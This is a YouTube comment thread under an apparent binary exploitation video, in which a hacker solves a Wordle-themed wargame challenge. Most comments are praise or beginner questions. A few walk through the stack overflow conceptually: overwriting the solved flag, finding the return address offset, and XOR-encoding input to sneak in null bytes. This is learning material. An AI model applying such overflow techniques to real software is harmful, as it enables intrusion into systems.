There are no "skip this part" parts in this great video: every given minute is useful, fun and help to understand and develop a quick thinking scheme.. I enjoyed it from beginning to the end, thanks!!

This has become one of my favorite channels over the last couple of months and i feel difficult concepts have explained very well by John. I would like to extend my gratitude by teaching you how to play Wordle. Don't double guess letters John.

Thanks John, always great content you put out. Although sometimes I have no idea what's going on, but I'm still learning and you such an inspiration.

John's got great eyebrows, they're naturally arched. Anyway, I'm a new follower (and new to this field) and am glad I found this channel. He's so smart. Keep up the good work!

Nicely done. John Hammond is on fire with this one. I love your mug by the way - keep up the amazing work!

love the pwn content can't wait for more 😌

This was a real nice walk through. The 18 and disas for the function was all I needed at that point. Thanks, it would have taken me forever to figure it out to that point.

Great video. I paused the video around 25 minutes when I decided I wanted to try the challenge myself, ended up taking me like 30-40 minutes to beat it but I did have that head start from what I had seen in the video prior with the overrun when copying to the state words array though I somehow missed the game over flag being set inside an "else if" so I wasted a bit of time debugging trying to figure out why that wasn't breaking the main loop. Still despite the head start it was a fun little challenge figuring out the rest. For the return address I went an easier route of looking at the stack framing at the start of the main function knowing the address will be stored on top of the stack, here we see RBP is pushed onto the stack and RSP is moved into RBP meaning RBP+8 points to the return address. From here it was a matter of figuring out where the state structure was stored which was easy looking at the attempts variable stored at RBP-30 which puts the words array at RBP-2E. So with this I could determine the words array came 54 bytes before and that the return address starts at the last byte of the 11th guess. After figuring this out I did a double check by dumping the registers and memory in the debugger after breaking at the end of the function.

Hey John Nice vid! I just have a question, how do you know these wargames. Like there are many resources but....staying updated and i feel i miss so much!

Before watching John do binary exploitation, I understood none of it. Now, after watching several of John's videos on binary exploitation, I understand....absolutely none of it. But it's fun to watch him try to figure things out.

Wow, I think this is probably the first time I actually fully followed one of these (with some rewinding), probably because I've only recently starting at looking at structs since I've started learning OpenCL (and in the same time trying to make sense of the buffers being exchanged from gpu into python or c++). I'm not really into security/hacking, I just seem to enjoy trying to make sense of bits of these videos. So let me get this straight: - The loop only breaks when the right solution is given, or on (exactly) the sixth guess (but not on 7th+) but we want to stay in it (because with every guess we start writing further into the stack). - Because of this, we want to skip the check for the sixth guess by giving the right solution, in the same time this marks the game as solved, but we can overwrite this. This is because we copy the full buffer over the words grid and not just the first five characters (though for future writes, only the first five character matter as we will re-overwrite the rest on future passes). This kinda happens automatically, because a newline always gets appended to your input and this always gets replaced by 0? - Guess 7 is crucial, because trying to index into state.words actually starts to write beyond it (we were writing beyond before, but now everything we write is beyond), in this case state.words[7] which begins at the solved variable. Here if the first character of the word input is anything other than 0, state.solved evaluates as true in the while check, with the caveat that after we write the whole buffer onto the stack, we then encrypt its first five bytes. So actually, if the first character of the guess encrypts to anything other than zero on this guess, the loop breaks. The encryption is actually important here, because its how you sneak your null byte past the strlen check (otherwise you have a zero length string). - After this, we just keep writing until we touch memory the process doesn't own and we get a segfault? But the stuff we want to get to is before that, so here begins the game of trying to overwrite mains return pointer? -John ends up having to write data that encrypts to a target address, but given that we actually write 16 chars every time and only the first 5 get encrypted, would it be simpler to try to overwrite rip one or two guesses earlier by entering something like "GUESS " ( I should probably just try it myself :) ) edit: idea doesn't work, each line gets sent as separate input ( can't have in the middle :( )

Great video John! The RET2 wargames look really interesting! Too bad they ask $999 for 3 months of access. This is around the same amount of money I paid a few years ago to get OSCP certified :')

Good morning Mrs Hammond need a bet help so in order to play that game do we need a virtual machine..??

Great video!

It would have been much easier to just send the xor encrypted bytes instead of sending A's etc. and trying to figure out what the resulting rip bytes correspond to. But aside from that very interesting video!

Why do we observe hex(char ^ 0x27 +2) where we write char? (e.g. "0x68 for "A")?

Hello understanding the debugger how does he know to look at the rip line?

This is great - a starting point for learning pwntools!

Great video 😎

almost Shakespeare worthy ;)

Thanks for making this video

What debugger is being used here?

How did you know the xor 0x26 was the encryption byte, how could did you find that link between the source code and the disassembler?

its best to watch it fully and see how u fixed the issue so u know what went wrong.

hi John

He is going for OSEE 😎

I’m not gonna pretend like I know anything about binary exploitation or anything Hackery in general but before I get to the solution, I think maybe if you type in a specific string into the input it gets xor ed into a different, more dangerous byte that will screw with the code or something

50:13 omg I died laughing. So relatable

In the technical way, is this heap overflow? Because you overflow the variable in the object?

👍!

shmoocon 👀

so much. Can’t wait to start making soft.

00:23 2 many secrets RET2 systems I want to believe took me like 5 mins btw...

Can we all appreciate the fact that he destroyed a

Where is the point the "\x29" comes up? I rewatched but John suddenly pulls the "\x29" out of thin air.

Love From Muslim 💜💜💜💜

6:39 the wordle game has a bug, there is no way the second E in CREED is yellow when the solution is CYBER

3 comments?

43:05

Nice vid but binexp in a browser is haram

hmmm really?

It's in local storage Mr hacker

По русскому можно ? По казахский вобще каеф чтобы было понятно

Such a sloppy script 🤣